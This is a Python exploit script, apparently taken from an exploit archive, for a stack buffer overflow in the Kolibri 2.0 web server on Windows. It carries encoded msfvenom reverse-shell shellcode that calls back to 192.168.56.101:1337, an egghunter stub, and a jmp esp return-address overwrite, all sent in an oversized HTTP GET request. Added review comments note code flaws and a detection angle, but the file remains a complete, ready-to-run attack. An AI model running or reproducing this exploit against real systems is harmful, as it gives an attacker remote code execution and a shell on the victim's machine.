## https://sploitus.com/exploit?id=PACKETSTORM:173967
#!/usr/bin/python3
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]
# Date: 2 August 2023
# Exploit Author: Mahmoud NourEldin @Engacker
# Vendor App:
# https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
# Version: Kolibri 2.0
# Tested on: Windows 10
# Description:
# For the first time making the egghunter jumping to the beginning of the
# stack
#
# Structure of this script (as written): build a fixed-size buffer whose
# layout is documented inline, wrap it in the path of a single HTTP GET
# request-line, send it once, and close the socket.

# NOTE(review): `time` and `os` are imported but never referenced below.
import socket, time, sys, os

# Argument check: exactly two positional arguments (target IP and port).
if len(sys.argv) != 3:
    print(f"[*] Usage: {sys.argv[0]} <Ip Victime> <Port> \n[*] Exploit created by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt")
    # NOTE(review): exits with status 0 on this error path.
    sys.exit(0)
host = sys.argv[1]
# A non-numeric port raises ValueError here; it is not caught by the
# `except socket.error` handler further down.
port = int(sys.argv[2])


try:
    # [BadChars] \x00\x0a\x0d\x20\x3d\x3f
    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
    # EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"
    #
    # `buf` = the 8-byte tag "w00tw00t" immediately followed by the encoded
    # shellcode the msfvenom line above describes. The egghunter defined
    # later scans memory for this tag; the inline note below says so.
    buf = b"w00tw00t"
    buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"
    buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"
    buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"
    buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"
    buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"
    buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"
    buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"
    buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"
    buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"
    buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"
    buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"
    buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"
    buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"
    buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"
    buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"
    buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"
    buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"
    buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"
    buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"
    buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"
    buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"
    buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"
    buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"
    buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"
    buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"
    buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"
    buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"
    buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"
    buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"
    buf += b"\x68\xbd\xc6"

    # 32-bit egghunter stub (50 bytes). The 4-byte tag it compares against,
    # "w00t", is visible as 77 30 30 74 in the third line.
    egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
    egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
    egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
    egghunter += b"\xff\xe7"

    # Saved-return-address overwrite: 0x10012442 written little-endian.
    # The author identifies it as a `jmp esp`; the module it lives in is
    # not named on this page.
    eip = b"\x42\x24\x01\x10"#0x10012442 jmp esp
    '''
payload length is: 800byte
EIP overwritten in 516 place which make a jmp to ESP
ESP include the egghunter and number of CCCC
Egghunter searching for w00tw00t+shellcode which exist in the first
request [buf]
Others just for place
'''
    # Layout: NOP sled sized so that `buf` ends at offset 515, then the
    # 4-byte `eip` overwrite, then `egghunter` plus 'C' filler padded to
    # 268 bytes. By arithmetic that is 515 + 4 + 268 = 787 bytes; the
    # "800byte" figure in the note above may be counting the HTTP framing
    # as well — unverified.
    payload = b"\x90"*(515-len(buf))+ buf + eip + egghunter + (268-len(egghunter)) *b"C"

    #The request of the server
    # The whole payload is carried in the request-line path. The Host header
    # is hard-coded (192.168.56.102:8080) rather than derived from `host`/`port`.
    # Detection note: a request-line of this size, consisting largely of 0x90
    # and other non-printable bytes, is far outside normal HTTP and is the
    # kind of anomaly a URI length / character-class rule on a proxy or IDS
    # would surface.
    request = b""
    request += b"GET /"+payload+b" HTTP/1.1\r\n"
    request += b"Host: 192.168.56.102:8080\r\n\r\n"

    #Connecting to the server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # f-string with no placeholders; plain string would do.
    print(f"[*]Sending The Evil Paylod...\nSee your reverse shell")
    s.connect((host, port))
    # NOTE(review): the socket is not managed by `with`/`finally`, so it is
    # left open if connect() or send() raises.
    s.send(request)
    s.close()
    print("[x]Done")

#if can't connect
# Only socket.error is handled here; any other exception propagates.
except socket.error:
    print("Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping the machine?")